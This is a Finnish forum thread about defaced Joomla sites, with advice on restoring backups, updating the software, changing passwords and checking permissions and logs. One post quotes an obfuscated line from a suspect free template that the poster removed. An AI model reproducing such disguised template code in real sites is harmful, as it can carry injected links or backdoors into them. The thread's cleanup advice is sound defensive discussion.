Joomlaportal.fi

Elikkäs joku ystävällinen kaveri on käynyt hakkeroitumassa sivuilleni, pääsivulla lukee vain: HackeD By *hakkerin nimi poistettu ylläpidon toimesta*

En pääse kiinni joomlaan, versio 1.5 jotain, vaikka admin käyttöliittymä toimii, ehkä salasanat on vaihdettu.
Pääsen sivustoon kiinni ainoastaan FTP:llä.

Miten asiassa kannattaa edetä, itselläni kun nämä asiat eivät ole kovin hyvin hanskassa niin ajattelin joomlan sekä tietokannan poistoa, minkä jälkeen voisin asentaa uusimman joomla version ja luoda uuden tietokannan. Joomlan päivitys olisi ollut muutenkin ajankohtainen.

Jos näin teen niin mitä tiedostoja/kansioita voin lähteä poistamaan ja pitääkö tietokanta poistaa vasta kun joomla on poistettu?

Ota sivusta varmuuskopio omalle koneellesi, aja tiedostot virustutkalla, kopioi uusi Joomla! 1.5.6 tiedostojen päälle.

Tarkista ettei ylimääräisiä tiedostoja ole ilmaantunut, vaihda salasanat (myös tietokannan käyttäjän) ja mieluiten tietokanta myös vaihtoon.

Jos mitään hälyyttävää ei löydy, siirrä korjatut tiedostot takaisin palvelimelle.

Minunkin sivut hakkeroitiin 24.8. Palveluntarjoaja Datamappi siirsi oman varmuuskopion palvelimelle. En tiedä koskeeko varmuuskopio myös tietokantaa. Poistin hakkeroidun version, mutta miten jatkaa tästä eteenpäin? Pääsen tiedostoihin käsiksi vain FTP:llä.

Jotain ohjeita olen foorumista löytänyt siihen miten Joomla Packilla tehdyt varmuuskopiot palautetaan. Itseltäni löytyy JoomlaPackillä tehty varmuuskopio, jossa myös tietokanta on kopsattu. Kannattaisko yrittää siitä tehdä palautusta?

Eikö datamappi voi palauttaa varmuuskopiota? Kysy kumpikin yllä mainittu.


No ilman muuta.

Kerronpa nyt tähän väliin oman tapauksen (sen takia, koska omat varmuuskopiot oli liian vanhat järkevään palauttamiseen).
Jätin hostaajalle vastaajaan viestin hakkeroinnista. Tuli tekstari, jossa kertoi, että voi ottaa varmuuskopion jo tehdystä varmuuskopiosta, joka voidaan sitten joskus myöhemmin palauttaa (sillä hetkellä en pystynyt asiaa hoitamaan). Reilun viikon päästä pyysin varmuuskopion palautusta. Tämä tapahtui olosuhteisiin nähden nopeasti. Sivusto pystyssä ja päivittämään. Kaikki ok (kop, kop).

Hacked http://lapPOISTETTU.com/  :P
Täytyy alkaa sorvaamaan varmuuskopioiden kanssa kun ehtii..


Tällä foorumilla emme salli linkkejä hakkeroiduille sivustoille.
quietFinn

Liittyykö tähän ne useat salasana/käyttäjätunnusresetointipyynnöt joita on mulle tullut..?

Ja ennen sitä laita nyt ihmeessä ne sivut kiinni!

Kiitos
Kävin palauttamassa vanhan varmuuskopion ja sivusto pelaa. Mitäkähän kaikkea minun kannattais muuttaa/päivittää tuonne vai riittääkö että teen uudet salasanat jokapaikkaan?

Nyt sivustolle oli taas joku onnistunut muuttamaan adminin salasanan ja oli käynyt vaan vaihtamassa sivupohjan johonkin vanhaan, niinkuin kiusantekoa.. :P Onko mulla jossain hakemistossa liian väljät oikeudet vai miten tuo on mahdollista?!? ???

(taas tuli kyllä sähköpostiin viimeisen viikon aikana varmaan 8 niitö salasananpalutusviestejä, eli onko siellä joku kone joka arpoo sitä mun salasanaa?

Se usi salasana joka siellä on edellisen hakkeroinnin jälkeen ollut niin ei kyllä ole mitenkään ravattavissa - ihan hatusta vetaistu yli kahdeksannumeroinen kirjainten ja numeroiden yhdistelmä..

Kannattaa käydä tarkkaan läpi seuraavassa viestiketjussa ehdotetut parannukset:
http://www.joomlaportal.fi/component/option,com_smf/Itemid,51/topic,11495

Varmista että Joomla on päivitetty, komponentit ovat ajantasalla eivätkä haavoittuvaisia. Poista "Admin"-niminen tunnus. Käy läpi kaikki hakemistot, ja varmista että niihin ei ole ujutettu ylimääräisiä tiedostoja. Tarkista hakemistojen ja tiedostojen Chmod-käyttöoikeudet. Suojaa tärkeitä kansioita ulkopuoliselta pääsyltä.

Sen jälkeen suosittelisin että vaihdat kaikki salasanat, myös ftp-salasanan ja sql-käyttäjän salasanan.

Lue lokitiedostoista mistä on menty sisään. Yleensä jokin joomla rungon ulkopuolinen komponentti tai lisäosa on kyseessä, joka on vanhentunut ja mahdollisesti "ei käytössä" mutta edelleen järjestelmässä mukana (itselleni kävi näin). Päivitä kyseinen palikka tai poista se kokonaan joomlasta.

Joo tuossa webtehtaan jutussa oli hyviä juttuja tuo admininpoisto ja noita kansioiden oikeuksia muokkailin (se chmodjuttu jäi vielä eäselväksi) -Olenkohan lie nirhannut moisen lokitiedoston siinävaiheessa kun palautin varmuuskopion, onko se joomlan adminpaneelissa? -Sehän voi olla joku noista kolmannen osapuolen komponenteista kun niitä aikamonta on - ja samoja komponentteja molemmilla mun sivustoilla, ja molempiin on tullut niitä resetointipyyntöjä.. ..toista ei oo murrettu ja tää joka on niin admin-salasanan ne on aina vaihtuneet..

webtehdas kirjoitti linkin jossa on linkki sivustolle joka sisältää listauksen osista joista on mahdollista päästä sisään järjestelmään - käy lukemassa se ja vertaa sinun Joomlaasi.
Jos palvelussasi on cPanel käytössä niin sieltä löytää vierailijat ja mitä he ovat lukeneet ja käyneet läpi, tällöin haku rajautuu yleensä vain yhteen komponenttiin josta ollaan tultu läpi ja aiheutettu vahinko. Jos sinulla ei ole mahdollisuutta lukea lokitietoja niin saat ne palveluntarjoajaltasi. Jos taas sivustot ovat omalla koneellasi niin lue loki sieltä, jos sinulla on lokitietojen kirjaus päällä.

No johan nyt.mullekin kävi ylläri kun äsken latasin täältä uusimman joomlan 20 version ja purin koneelle ja ajoin sen uuteen mestaan palvelimelle. Tein admin tunnarit ja laitoin sivut pystyyn. Aloin höyläämään uutta banneria etusivulle fotarilla ja sen kans meni sit puoltuntii..ja sit kun päivitin etusivun kuvan vaihdon yhteydes niin yllätys yllätys sivu hakkeroitu..P..kle.

Ihmetyttää vaan et mist tulivat läpi..yhtään lisäosaa ei ole asennettu.

Ja vain index.php sivu joomlassa oli muutettu...sinänsä ihme kyllä.

Tiedosto-oikeudet?

Versio on suoraan Joomla.org sivustolta ladattu 1.5.20 versio(full) ja sen päivityspaketit(3 viimeisintä kuten tapana on ollut).
http://joomlacode.org/gf/project/joomla/frs/

Katso tai pyydä palveluntarjoajaasi katsomaan.

Itselläni ei ole ollut samankaltaisia ongelmia... eikä hälyttäviä viestejä ole tullut minulle asti muiltakaan... (että olisi kysymys olisi meidän paketissa joka siis on Joomla! projektin paketti suoraan... tarkistan kuitenkin)

Tais olla syypäänä  http://www.joomla24.com/ etusivulla näkyvä tennis template jonka latasin siihen. Sen ylävalikon home linkin alapuolella oli hostauslinkki johonkin mestaan jonka poistin suoraan korvaamalla tekstin

defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );

tekstillä

defined('_JEXEC') or die('Restricted access');

Linkki katos kyllä valikosta mut sivutkin tuli sit siin sivus hakkeroiduks..
Sinänsä ei oo iso homma nyt vaihdella tietokantojen nimiä ja salasanoja mut vituttaahan se kuiteskin.

Myös sivupohjat (lataavat usein myös lisäosia(plugins) sun muita) kuten kaikki jota lataat sivustolle ylläpitäjänä voivat ladata mitä vain... tarkista lähde ja sisältö sekä testaa turvallisessa ympäristössä ennen kuin lataat live serverille...

ko sivusto ei ole tuttu minulle ja tuskin tuleekaan...

Helpoin ja nopein tapa tuossa vaiheessa (kun sivustoa ei ole juurikaan) on pistää tietokanta sileeksi sekä kaikki tiedostot hakemistoissa ja asentaa uusiksi... n. 5min. (on suositeltavaa/pakollista vaihtaa tietokannan ja sivuston salasanat myös!)

Tällaisista tapauksista pitää aina ja ehdottomasti ilmoittaa palveluntarjoajalle. Heillä on paremmat edellytykset selvittää miten tuo hakkerointi on tehty, ja neuvoa miten sivuston saa turvalliseksi.

Minulla oli kans kaksi sivustoa hakkeroitu eilen (sunnuntai 22.8.2010) illan aikana.
Sivuilla oli teksti:

[Moderator: hakkerin viite poistettu. Hakkerien "propseja" ei pidä julkaista missään, sitähän he juuri hakevat]

Nuo ovat ilmeisesti kahlanneet koneellisesti läpi tuhansia sivuja ja laittaneet kaikkille johin pääsi tunkeutumaan kyseisen tekstin.

Sivut olivat kumpikin Joomla 1.5.18 -versiossa. Luultavasti olivat vaihtaneet vain index.php:n.
Sivut lähtivät toimimaan kun pudotin ftp:llä päälle 1.5.18-->1.5.20 päivityksen ja juureen puhtaan index.php-tiedoston. Tuon puhtaan index.php:n siirto olisi riittänyt, mutta päivitin sivut samalla. Vielä ois varmaan parasta pudottaa sivuille koko full 1.5.20 versio, niin mahdollisesti muutkin muutetut tiedostot korvautuisivat "puhtailla" tiedostoilla.

 

Jeps.. saman firman tekeleitä oli munkin sivuilla. Kävin vilkasemassa viel ihan niiden omassa osoitteessakin ja kirjauduin sisäänkin ko palvelimelle..mut en viitsinyt siin kovin kauaa sit heilua sisällä kun ei oikein tienny et mitä kaikkee paskaa silt saa koneelleen.

Oma hostini antoi ymmärtää että heidän palvelimelleen tuo reikä oli syntynyt cpanelin kautta päivityksen yhteydessä. Siinä sitä sitten meni tunti kivasti korjailessa useampiakin joomlasivuja.  Homma on ollut koneellista ja joomlan versiolla ei ole ollut väliä sillä vanhemmatkin jopa 1.0.x sarjan sivut oli korkattu vaihtamalla index.php sivu hakkereiden omalla. Onneksi moiset ei olleet sen ihmeemmin sotkeneet paikkoja, eli pääsi shut vähällä (salasanojen + tietokantojen) vaihto hommalla.

Mitä tuossa tietokannan uusimisessa menettää?

Pahimassa tapauksessa kaiken datan jos oikein paska flaksi käy. Tietokanta on pakko käydä läpi jotta voi olla varma ettei sinne ole tehty mitään takaportteja yms paskakoodeja jotka sitten alkaa bugittaan myöhemmin tai mahdollistaa sisääntulon uudelleen. Mutta ton uusimman sivun kohdalla oli fiksuinta laittaa kaikki uusiks aina hallinnan salasanoja ja tietokantojen nimiä ja tunnareita myöden koska sivu oli vielä täysin raakile.
Noi on paskoja hommia joita ei toivois kohdalleen jos isvusto on vähänkin isompi ja vanhempi.